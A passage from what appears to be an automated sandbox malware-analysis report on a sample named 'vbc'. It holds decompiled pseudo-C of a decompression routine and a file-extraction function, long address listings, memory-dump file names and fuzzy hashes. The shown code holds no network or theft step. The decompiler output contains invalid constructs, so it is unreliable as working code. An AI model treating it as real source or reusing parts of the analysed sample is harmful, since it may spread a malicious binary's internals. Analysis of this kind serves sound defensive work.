											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
											L130:
											 *(__ebp - 0x58) = __eax;
											 *(__ebp - 0x40) = 3;
											goto L144;
										case 0x14:
											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
											__eax =  *(__ebp - 0x80);
											 *(_t613 - 0x88) = _t533;
											goto L1;
										case 0x15:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
											__al = __al & 0x000000fd;
											__eax = (__eflags >= 0) - 1 + 0xb;
											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
											goto L120;
										case 0x16:
											__eax =  *(__ebp - 0x30);
											__eflags = __eax - 4;
											if(__eax >= 4) {
												_push(3);
												_pop(__eax);
											}
											__ecx =  *(__ebp - 4);
											 *(__ebp - 0x40) = 6;
											__eax = __eax << 7;
											 *(__ebp - 0x7c) = 0x19;
											 *(__ebp - 0x58) = __eax;
											goto L145;
										case 0x17:
											L145:
											__eax =  *(__ebp - 0x40);
											 *(__ebp - 0x50) = 1;
											 *(__ebp - 0x48) =  *(__ebp - 0x40);
											goto L149;
										case 0x18:
											L146:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x18;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t484 = __ebp - 0x70;
											 *_t484 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t484;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L148:
											_t487 = __ebp - 0x48;
											 *_t487 =  *(__ebp - 0x48) - 1;
											__eflags =  *_t487;
											L149:
											__eflags =  *(__ebp - 0x48);
											if( *(__ebp - 0x48) <= 0) {
												__ecx =  *(__ebp - 0x40);
												__ebx =  *(__ebp - 0x50);
												0 = 1;
												__eax = 1 << __cl;
												__ebx =  *(__ebp - 0x50) - (1 << __cl);
												__eax =  *(__ebp - 0x7c);
												 *(__ebp - 0x44) = __ebx;
												while(1) {
													 *(_t613 - 0x88) = _t533;
													goto L1;
												}
											}
											__eax =  *(__ebp - 0x50);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
											__eax =  *(__ebp - 0x58);
											__esi = __edx + __eax;
											 *(__ebp - 0x54) = __esi;
											__ax =  *__esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												__cx = __ax >> 5;
												__eax = __eax - __ecx;
												__edx = __edx + 1;
												__eflags = __edx;
												 *__esi = __ax;
												 *(__ebp - 0x50) = __edx;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L148;
											} else {
												goto L146;
											}
										case 0x19:
											__eflags = __ebx - 4;
											if(__ebx < 4) {
												 *(__ebp - 0x2c) = __ebx;
												L119:
												_t393 = __ebp - 0x2c;
												 *_t393 =  *(__ebp - 0x2c) + 1;
												__eflags =  *_t393;
												L120:
												__eax =  *(__ebp - 0x2c);
												__eflags = __eax;
												if(__eax == 0) {
													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
													goto L170;
												}
												__eflags = __eax -  *(__ebp - 0x60);
												if(__eax >  *(__ebp - 0x60)) {
													goto L171;
												}
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
												__eax =  *(__ebp - 0x30);
												_t400 = __ebp - 0x60;
												 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
												__eflags =  *_t400;
												goto L123;
											}
											__ecx = __ebx;
											__eax = __ebx;
											__ecx = __ebx >> 1;
											__eax = __ebx & 0x00000001;
											__ecx = (__ebx >> 1) - 1;
											__al = __al | 0x00000002;
											__eax = (__ebx & 0x00000001) << __cl;
											__eflags = __ebx - 0xe;
											 *(__ebp - 0x2c) = __eax;
											if(__ebx >= 0xe) {
												__ebx = 0;
												 *(__ebp - 0x48) = __ecx;
												L102:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__eax = __eax + __ebx;
													 *(__ebp - 0x40) = 4;
													 *(__ebp - 0x2c) = __eax;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x644;
													__eflags = __eax;
													L108:
													__ebx = 0;
													 *(__ebp - 0x58) = __eax;
													 *(__ebp - 0x50) = 1;
													 *(__ebp - 0x44) = 0;
													 *(__ebp - 0x48) = 0;
													L112:
													__eax =  *(__ebp - 0x40);
													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
														_t391 = __ebp - 0x2c;
														 *_t391 =  *(__ebp - 0x2c) + __ebx;
														__eflags =  *_t391;
														goto L119;
													}
													__eax =  *(__ebp - 0x50);
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
													__eax =  *(__ebp - 0x58);
													__esi = __edi + __eax;
													 *(__ebp - 0x54) = __esi;
													__ax =  *__esi;
													__ecx = __ax & 0x0000ffff;
													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
													__eflags =  *(__ebp - 0xc) - __edx;
													if( *(__ebp - 0xc) >= __edx) {
														__ecx = 0;
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
														__ecx = 1;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
														__ebx = 1;
														__ecx =  *(__ebp - 0x48);
														__ebx = 1 << __cl;
														__ecx = 1 << __cl;
														__ebx =  *(__ebp - 0x44);
														__ebx =  *(__ebp - 0x44) | __ecx;
														__cx = __ax;
														__cx = __ax >> 5;
														__eax = __eax - __ecx;
														__edi = __edi + 1;
														__eflags = __edi;
														 *(__ebp - 0x44) = __ebx;
														 *__esi = __ax;
														 *(__ebp - 0x50) = __edi;
													} else {
														 *(__ebp - 0x10) = __edx;
														0x800 = 0x800 - __ecx;
														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
														 *__esi = __dx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L111:
														_t368 = __ebp - 0x48;
														 *_t368 =  *(__ebp - 0x48) + 1;
														__eflags =  *_t368;
														goto L112;
													} else {
														goto L109;
													}
												}
												__ecx =  *(__ebp - 0xc);
												__ebx = __ebx + __ebx;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
													__ecx =  *(__ebp - 0x10);
													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													__ebx = __ebx | 0x00000001;
													__eflags = __ebx;
													 *(__ebp - 0x44) = __ebx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													L101:
													_t338 = __ebp - 0x48;
													 *_t338 =  *(__ebp - 0x48) - 1;
													__eflags =  *_t338;
													goto L102;
												} else {
													goto L99;
												}
											}
											__edx =  *(__ebp - 4);
											__eax = __eax - __ebx;
											 *(__ebp - 0x40) = __ecx;
											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
											goto L108;
										case 0x1a:
											L56:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1a;
												goto L170;
											}
											__ecx =  *(__ebp - 0x68);
											__al =  *(__ebp - 0x5c);
											__edx =  *(__ebp - 8);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
											 *( *(__ebp - 0x68)) = __al;
											__ecx =  *(__ebp - 0x14);
											 *(__ecx +  *(__ebp - 8)) = __al;
											__eax = __ecx + 1;
											__edx = 0;
											_t192 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t192;
											goto L79;
										case 0x1b:
											L75:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1b;
												goto L170;
											}
											__eax =  *(__ebp - 0x14);
											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
											__eflags = __eax -  *(__ebp - 0x74);
											if(__eax >=  *(__ebp - 0x74)) {
												__eax = __eax +  *(__ebp - 0x74);
												__eflags = __eax;
											}
											__edx =  *(__ebp - 8);
											__cl =  *(__eax + __edx);
											__eax =  *(__ebp - 0x14);
											 *(__ebp - 0x5c) = __cl;
											 *(__eax + __edx) = __cl;
											__eax = __eax + 1;
											__edx = 0;
											_t274 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t274;
											__eax =  *(__ebp - 0x68);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											_t283 = __ebp - 0x64;
											 *_t283 =  *(__ebp - 0x64) - 1;
											__eflags =  *_t283;
											 *( *(__ebp - 0x68)) = __cl;
											L79:
											 *(__ebp - 0x14) = __edx;
											goto L80;
										case 0x1c:
											while(1) {
												L123:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													break;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t414 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t414;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
												__eflags =  *(__ebp - 0x30);
												 *( *(__ebp - 0x68)) = __cl;
												 *(__ebp - 0x14) = _t414;
												if( *(__ebp - 0x30) > 0) {
													continue;
												} else {
													L80:
													 *(__ebp - 0x88) = 2;
													goto L1;
												}
											}
											 *(__ebp - 0x88) = 0x1c;
											goto L170;
									}
								}
								L171:
								_t535 = _t534 | 0xffffffff;
								goto L172;
							}
						}
					}
				}
			}

0x00000000
0x00406be3
0x00406be3
0x00406be7
0x00406c10
0x00406c1a
0x00406be9
0x00406bf2
0x00406bff
0x00406c02
0x00406f46
0x00406f46
0x00406f49
0x00406f49
0x00406f49
0x00406f4f
0x00406f55
0x00406f5b
0x00406f75
0x00406f78
0x00406f7e
0x00406f89
0x00406f8b
0x00406f5d
0x00406f5d
0x00406f6c
0x00406f70
0x00406f70
0x00406f95
0x00000000
0x00000000
0x00406f97
0x00406f9b
0x0040714a
0x00407160
0x00407168
0x0040716f
0x00407171
0x00407178
0x0040717c
0x0040717c
0x00406fa7
0x00406fae
0x00406fb6
0x00406fb9
0x00406fbc
0x00406fbc
0x00406fc2
0x00406fc2
0x0040675e
0x0040675e
0x0040675e
0x00406767
0x00000000
0x00000000
0x0040676d
0x00000000
0x00406778
0x00000000
0x00000000
0x00406781
0x00406784
0x00406787
0x0040678b
0x00000000
0x00000000
0x00406791
0x00406794
0x00406796
0x00406797
0x0040679a
0x0040679c
0x0040679d
0x0040679f
0x004067a2
0x004067a7
0x004067ac
0x004067b5
0x004067c8
0x004067cb
0x004067d7
0x004067ff
0x00406801
0x0040680f
0x0040680f
0x00406813
0x00000000
0x00000000
0x00000000
0x00000000
0x00406803
0x00406803
0x00406806
0x00406807
0x00406807
0x00000000
0x00406803
0x004067dd
0x004067e2
0x004067e2
0x004067eb
0x004067f3
0x004067f6
0x00000000
0x004067fc
0x004067fc
0x00000000
0x004067fc
0x00000000
0x00406819
0x00406819
0x0040681d
0x004070c9
0x00000000
0x004070c9
0x00406826
0x00406836
0x00406839
0x0040683c
0x0040683c
0x0040683c
0x0040683f
0x00406843
0x00000000
0x00000000
0x00406845
0x0040684b
0x00406875
0x0040687b
0x00406882
0x00000000
0x00406882
0x00406851
0x00406854
0x00406859
0x00406859
0x00406864
0x0040686c
0x0040686f
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x004068b4
0x004068ba
0x004068bd
0x004068ca
0x004068d2
0x00406f46
0x00000000
0x00000000
0x00406889
0x00406889
0x0040688d
0x004070d8
0x00000000
0x004070d8
0x00406899
0x004068a4
0x004068a4
0x004068a4
0x004068a7
0x004068aa
0x004068ad
0x004068b2
0x00000000
0x00000000
0x00000000
0x00000000
0x00406f49
0x00406f49
0x00406f4f
0x00406f55
0x00406f5b
0x00406f75
0x00406f78
0x00406f7e
0x00406f89
0x00406f8b
0x00406f5d
0x00406f5d
0x00406f6c
0x00406f70
0x00406f70
0x00406f95
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x004068da
0x004068dc
0x004068df
0x00406950
0x00406953
0x00406956
0x0040695d
0x00406967
0x00406f46
0x00406f46
0x00000000
0x00406f46
0x00406f46
0x004068e1
0x004068e5
0x004068e8
0x004068ea
0x004068ed
0x004068f0
0x004068f2
0x004068f5
0x004068f7
0x004068fc
0x004068ff
0x00406902
0x00406906
0x0040690d
0x00406910
0x00406917
0x0040691b
0x00406923
0x00406923
0x00406923
0x0040691d
0x0040691d
0x0040691d
0x00406912
0x00406912
0x00406912
0x00406927
0x0040692a
0x00406948
0x0040694a
0x00000000
0x0040692c
0x0040692c
0x0040692f
0x00406932
0x00406935
0x00406937
0x00406937
0x00406937
0x0040693a
0x0040693d
0x0040693f
0x00406940
0x00406943
0x00000000
0x00406943
0x00000000
0x00406b79
0x00406b7d
0x00406b9b
0x00406b9e
0x00406ba5
0x00406ba8
0x00406bab
0x00406bae
0x00406bb1
0x00406bb4
0x00406bb6
0x00406bbd
0x00406bbe
0x00406bc0
0x00406bc3
0x00406bc6
0x00406bc9
0x00406bc9
0x00406bce
0x00000000
0x00406bce
0x00406b7f
0x00406b82
0x00406b85
0x00406b8f
0x00406f46
0x00406f46
0x00000000
0x00406f46
0x00000000
0x00000000
0x00000000
0x00406c26
0x00406c2a
0x00000000
0x00000000
0x00406c30
0x00406c34
0x00000000
0x00000000
0x00406c3a
0x00406c3c
0x00406c40
0x00406c40
0x00406c43
0x00406c47
0x00000000
0x00000000
0x00406c97
0x00406c9b
0x00406ca2
0x00406ca5
0x00406ca8
0x00406cb2
0x00406f46
0x00406f46
0x00000000
0x00406f46
0x00406f46
0x00406c9d
0x00000000
0x00000000
0x00406cbe
0x00406cc2
0x00406cc9
0x00406ccc
0x00406ccf
0x00406cc4
0x00406cc4
0x00406cc4
0x00406cd2
0x00406cd5
0x00406cd8
0x00406cd8
0x00406cdb
0x00406cde
0x00406ce1
0x00406ce1
0x00406ce4
0x00406ceb
0x00406cf0
0x00000000
0x00000000
0x00406d7e
0x00406d7e
0x00406d82
0x00407120
0x00000000
0x00407120
0x00406d88
0x00406d8b
0x00406d8e
0x00406d92
0x00406d95
0x00406d9b
0x00406d9d
0x00406d9d
0x00406d9d
0x00406da0
0x00406da3
0x00000000
0x00000000
0x00406973
0x00406973
0x00406977
0x004070e4
0x00000000
0x004070e4
0x0040697d
0x00406980
0x00406983
0x00406987
0x0040698a
0x00406990
0x00406992
0x00406992
0x00406992
0x00406995
0x00406998
0x00406998
0x0040699b
0x0040699e
0x00000000
0x00000000
0x004069a4
0x004069aa
0x00000000
0x00000000
0x004069b0
0x004069b0
0x004069b4
0x004069b7
0x004069ba
0x004069bd
0x004069c0
0x004069c1
0x004069c4
0x004069c6
0x004069cc
0x004069cf
0x004069d2
0x004069d5
0x004069d8
0x004069db
0x004069de
0x004069fa
0x004069fd
0x00406a00
0x00406a03
0x00406a0a
0x00406a0e
0x00406a10
0x00406a14
0x004069e0
0x004069e0
0x004069e4
0x004069ec
0x004069f1
0x004069f3
0x004069f5
0x004069f5
0x00406a17
0x00406a1e
0x00406a21
0x00000000
0x00406a27
0x00000000
0x00406a27
0x00000000
0x00406a2c
0x00406a2c
0x00406a30
0x004070f0
0x00000000
0x004070f0
0x00406a36
0x00406a39
0x00406a3c
0x00406a40
0x00406a43
0x00406a49
0x00406a4b
0x00406a4b
0x00406a4b
0x00406a4e
0x00406a51
0x00406a51
0x00406a51
0x00406a57
0x00000000
0x00000000
0x00406a59
0x00406a5c
0x00406a5f
0x00406a62
0x00406a65
0x00406a68
0x00406a6b
0x00406a6e
0x00406a71
0x00406a74
0x00406a77
0x00406a8f
0x00406a92
0x00406a95
0x00406a98
0x00406a98
0x00406a9b
0x00406a9f
0x00406aa1
0x00406a79
0x00406a79
0x00406a81
0x00406a86
0x00406a88
0x00406a8a
0x00406a8a
0x00406aa4
0x00406aab
0x00406aae
0x00000000
0x00406ab0
0x00000000
0x00406ab0
0x00406aae
0x00406ab5
0x00406ab5
0x00406ab5
0x00406ab5
0x00000000
0x00000000
0x00406af0
0x00406af0
0x00406af4
0x004070fc
0x00000000
0x004070fc
0x00406afa
0x00406afd
0x00406b00
0x00406b04
0x00406b07
0x00406b0d
0x00406b0f
0x00406b0f
0x00406b0f
0x00406b12
0x00406b15
0x00406b15
0x00406b1b
0x00406ab9
0x00406ab9
0x00406abc
0x00000000
0x00406abc
0x00406b1d
0x00406b1d
0x00406b20
0x00406b23
0x00406b26
0x00406b29
0x00406b2c
0x00406b2f
0x00406b32
0x00406b35
0x00406b38
0x00406b3b
0x00406b53
0x00406b56
0x00406b59
0x00406b5c
0x00406b5c
0x00406b5f
0x00406b63
0x00406b65
0x00406b3d
0x00406b3d
0x00406b45
0x00406b4a
0x00406b4c
0x00406b4e
0x00406b4e
0x00406b68
0x00406b6f
0x00406b72
0x00000000
0x00406b74
0x00000000
0x00406b74
0x00000000
0x00406e01
0x00406e01
0x00406e05
0x0040712c
0x00000000
0x0040712c
0x00406e0b
0x00406e0e
0x00406e11
0x00406e15
0x00406e18
0x00406e1e
0x00406e20
0x00406e20
0x00406e20
0x00406e23
0x00000000
0x00000000
0x00406bd1
0x00406bd1
0x00406bd4
0x00406f46
0x00406f46
0x00000000
0x00406f46
0x00000000
0x00406f10
0x00406f14
0x00406f36
0x00406f39
0x00406f43
0x00406f46
0x00406f46
0x00000000
0x00406f46
0x00406f46
0x00406f16
0x00406f19
0x00406f1d
0x00406f20
0x00406f20
0x00406f23
0x00000000
0x00000000
0x00406fcd
0x00406fd1
0x00406fef
0x00406fef
0x00406fef
0x00406ff6
0x00406ffd
0x00407004
0x00407004
0x00000000
0x00407004
0x00406fd3
0x00406fd6
0x00406fd9
0x00406fdc
0x00406fe3
0x00406f27
0x00406f27
0x00406f2a
0x00000000
0x00000000
0x004070be
0x004070c1
0x00406fc2
0x00000000
0x00000000
0x00406cf8
0x00406cfa
0x00406d01
0x00406d02
0x00406d04
0x00406d07
0x00000000
0x00000000
0x00406d0f
0x00406d12
0x00406d15
0x00406d17
0x00406d19
0x00406d19
0x00406d1a
0x00406d1d
0x00406d24
0x00406d27
0x00406d35
0x00000000
0x00000000
0x0040700b
0x0040700b
0x0040700e
0x00407015
0x00000000
0x00000000
0x0040701a
0x0040701a
0x0040701e
0x00407156
0x00000000
0x00407156
0x00407024
0x00407027
0x0040702a
0x0040702e
0x00407031
0x00407037
0x00407039
0x00407039
0x00407039
0x0040703c
0x0040703f
0x0040703f
0x0040703f
0x0040703f
0x00407042
0x00407042
0x00407046
0x004070a6
0x004070a9
0x004070ae
0x004070af
0x004070b1
0x004070b3
0x004070b6
0x00406fc2
0x00406fc2
0x00000000
0x00406fc8
0x00406fc2
0x00407048
0x0040704e
0x00407051
0x00407054
0x00407057
0x0040705a
0x0040705d
0x00407060
0x00407063
0x00407066
0x00407069
0x00407082
0x00407085
0x00407088
0x0040708b
0x0040708f
0x00407091
0x00407091
0x00407092
0x00407095
0x0040706b
0x0040706b
0x00407073
0x00407078
0x0040707a
0x0040707d
0x0040707d
0x00407098
0x0040709f
0x00000000
0x004070a1
0x00000000
0x004070a1
0x00000000
0x00406d3d
0x00406d40
0x00406d76
0x00406ea6
0x00406ea6
0x00406ea6
0x00406ea6
0x00406ea9
0x00406ea9
0x00406eac
0x00406eae
0x00407138
0x00000000
0x00407138
0x00406eb4
0x00406eb7
0x00000000
0x00000000
0x00406ebd
0x00406ec1
0x00406ec4
0x00406ec4
0x00406ec4
0x00000000
0x00406ec4
0x00406d42
0x00406d44
0x00406d46
0x00406d48
0x00406d4b
0x00406d4c
0x00406d4e
0x00406d50
0x00406d53
0x00406d56
0x00406d6c
0x00406d71
0x00406da9
0x00406da9
0x00406dad
0x00406dd9
0x00406ddb
0x00406de2
0x00406de5
0x00406de8
0x00406de8
0x00406ded
0x00406ded
0x00406def
0x00406df2
0x00406df9
0x00406dfc
0x00406e29
0x00406e29
0x00406e2c
0x00406e2f
0x00406ea3
0x00406ea3
0x00406ea3
0x00000000
0x00406ea3
0x00406e31
0x00406e37
0x00406e3a
0x00406e3d
0x00406e40
0x00406e43
0x00406e46
0x00406e49
0x00406e4c
0x00406e4f
0x00406e52
0x00406e6b
0x00406e6d
0x00406e70
0x00406e71
0x00406e74
0x00406e76
0x00406e79
0x00406e7b
0x00406e7d
0x00406e80
0x00406e82
0x00406e85
0x00406e89
0x00406e8b
0x00406e8b
0x00406e8c
0x00406e8f
0x00406e92
0x00406e54
0x00406e54
0x00406e5c
0x00406e61
0x00406e63
0x00406e66
0x00406e66
0x00406e95
0x00406e9c
0x00406e26
0x00406e26
0x00406e26
0x00406e26
0x00000000
0x00406e9e
0x00000000
0x00406e9e
0x00406e9c
0x00406daf
0x00406db2
0x00406db4
0x00406db7
0x00406dba
0x00406dbd
0x00406dbf
0x00406dc2
0x00406dc5
0x00406dc5
0x00406dc8
0x00406dc8
0x00406dcb
0x00406dd2
0x00406da6
0x00406da6
0x00406da6
0x00406da6
0x00000000
0x00406dd4
0x00000000
0x00406dd4
0x00406dd2
0x00406d58
0x00406d5b
0x00406d5d
0x00406d60
0x00000000
0x00000000
0x00406abf
0x00406abf
0x00406ac3
0x00407108
0x00000000
0x00407108
0x00406ac9
0x00406acc
0x00406acf
0x00406ad2
0x00406ad5
0x00406ad8
0x00406adb
0x00406add
0x00406ae0
0x00406ae3
0x00406ae6
0x00406ae8
0x00406ae8
0x00406ae8
0x00000000
0x00000000
0x00406c4a
0x00406c4a
0x00406c4e
0x00407114
0x00000000
0x00407114
0x00406c54
0x00406c57
0x00406c5a
0x00406c5d
0x00406c5f
0x00406c5f
0x00406c5f
0x00406c62
0x00406c65
0x00406c68
0x00406c6b
0x00406c6e
0x00406c71
0x00406c72
0x00406c74
0x00406c74
0x00406c74
0x00406c77
0x00406c7a
0x00406c7d
0x00406c80
0x00406c80
0x00406c80
0x00406c83
0x00406c85
0x00406c85
0x00000000
0x00000000
0x00406ec7
0x00406ec7
0x00406ec7
0x00406ecb
0x00000000
0x00000000
0x00406ed1
0x00406ed4
0x00406ed7
0x00406eda
0x00406edc
0x00406edc
0x00406edc
0x00406edf
0x00406ee2
0x00406ee5
0x00406ee8
0x00406eeb
0x00406eee
0x00406eef
0x00406ef1
0x00406ef1
0x00406ef1
0x00406ef4
0x00406ef7
0x00406efa
0x00406efd
0x00406f00
0x00406f04
0x00406f06
0x00406f09
0x00000000
0x00406f0b
0x00406c88
0x00406c88
0x00000000
0x00406c88
0x00406f09
0x0040713e
0x00000000
0x00000000
0x0040676d
0x00407175
0x00407175
0x00000000
0x00407175
0x00406fc2
0x00406f49
0x00406f46

Memory Dump Source

Source File: 00000005.00000002.1185274086.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1185243112.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185313446.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185344377.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185477830.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185484437.000000000042B000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185490034.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185495870.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185506115.000000000046C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185511904.000000000046E000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5ce5b5824dab04b0af399fdb569f5160cdf810ce4d6e1efcb4a21919472af673
Instruction ID: 57281eb70c6d5ee4f1dcb93120720bdacd8771e53a80a41a257af2ecf5b7c0f8
Opcode Fuzzy Hash: 5ce5b5824dab04b0af399fdb569f5160cdf810ce4d6e1efcb4a21919472af673
Instruction Fuzzy Hash: 7C714431D04229DBEF28CF98C844BADBBB1FF44305F11806AD856BB291C7789A96DF44

Uniqueness

Uniqueness Score: -1.00%

Function 00403283 Relevance: 4.6, APIs: 3, Instructions: 101
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E00403283(intOrPtr _a4) {
				intOrPtr _t10;
				intOrPtr _t11;
				signed int _t12;
				void* _t14;
				void* _t15;
				long _t16;
				void* _t18;
				intOrPtr _t19;
				intOrPtr _t31;
				long _t32;
				intOrPtr _t34;
				intOrPtr _t36;
				void* _t37;
				intOrPtr _t49;

				_t32 =  *0x418ed4; // 0x955a
				_t34 = _t32 -  *0x40ce40 + _a4;
				 *0x42a24c = GetTickCount() + 0x1f4;
				if(_t34 <= 0) {
					L22:
					E00402E33(1);
					return 0;
				}
				E00403402( *0x418ee4);
				SetFilePointer( *0x40a01c,  *0x40ce40, 0, 0); // executed
				 *0x418ee0 = _t34;
				 *0x418ed0 = 0;
				while(1) {
					_t10 =  *0x418ed8; // 0x73508
					_t31 = 0x4000;
					_t11 = _t10 -  *0x418ee4;
					if(_t11 <= 0x4000) {
						_t31 = _t11;
					}
					_t12 = E004033EC(0x414ed0, _t31);
					if(_t12 == 0) {
						break;
					}
					 *0x418ee4 =  *0x418ee4 + _t31;
					 *0x40ce60 = 0x414ed0;
					 *0x40ce64 = _t31;
					L6:
					L6:
					if( *0x42a250 != 0 &&  *0x42a2e0 == 0) {
						_t19 =  *0x418ee0; // 0x1a4bd
						 *0x418ed0 = _t19 -  *0x418ed4 - _a4 +  *0x40ce40;
						E00402E33(0);
					}
					 *0x40ce68 = 0x40ced0;
					 *0x40ce6c = 0x8000; // executed
					_t14 = E0040672B(0x40ce48); // executed
					if(_t14 < 0) {
						goto L20;
					}
					_t36 =  *0x40ce68; // 0x40f919
					_t37 = _t36 - 0x40ced0;
					if(_t37 == 0) {
						__eflags =  *0x40ce64; // 0x0
						if(__eflags != 0) {
							goto L20;
						}
						__eflags = _t31;
						if(_t31 == 0) {
							goto L20;
						}
						L16:
						_t16 =  *0x418ed4; // 0x955a
						if(_t16 -  *0x40ce40 + _a4 > 0) {
							continue;
						}
						SetFilePointer( *0x40a01c, _t16, 0, 0);
						goto L22;
					}
					_t18 = E00405E99( *0x40a01c, 0x40ced0, _t37); // executed
					if(_t18 == 0) {
						_push(0xfffffffe);
						L21:
						_pop(_t15);
						return _t15;
					}
					 *0x40ce40 =  *0x40ce40 + _t37;
					_t49 =  *0x40ce64; // 0x0
					if(_t49 != 0) {
						goto L6;
					}
					goto L16;
					L20:
					_push(0xfffffffd);
					goto L21;
				}
				return _t12 | 0xffffffff;
			}

0x00403286
0x00403293
0x004032a6
0x004032ab
0x004033db
0x004033dd
0x00000000
0x004033e3
0x004032b7
0x004032ca
0x004032d0
0x004032d6
0x004032e1
0x004032e1
0x004032e6
0x004032eb
0x004032f3
0x004032f5
0x004032f5
0x004032fe
0x00403305
0x00000000
0x00000000
0x0040330b
0x00403311
0x00403317
0x00000000
0x0040331d
0x00403323
0x0040332d
0x00403343
0x00403348
0x0040334d
0x00403353
0x00403359
0x00403363
0x0040336a
0x00000000
0x00000000
0x0040336c
0x00403372
0x00403374
0x00403397
0x0040339d
0x00000000
0x00000000
